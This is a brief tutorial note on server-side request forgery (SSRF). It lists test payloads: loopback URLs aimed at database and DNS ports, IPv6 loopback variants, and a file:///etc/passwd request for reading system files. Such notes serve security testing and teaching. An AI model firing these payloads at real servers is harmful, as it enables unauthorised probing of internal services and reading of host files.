Server Side Request Forgery (SSRF) is a vulnerability in web applications whereby an attacker can make further HTTP requests through the server. An attacker can use this vulnerability to communicate with internal services on the server's network that are generally protected by firewalls.
Usage
Sanity Test Service
Test whether the input is sanitized by exploiting the function. Here it is an IP:PORT finding service, so test for localhost ports.
http://127.0.0.1:3306
http://localhost:5432
http://0.0.0.0:53
- IPv6
http://[::]:3306
http://:::3006
Reading files
file:///etc/passwd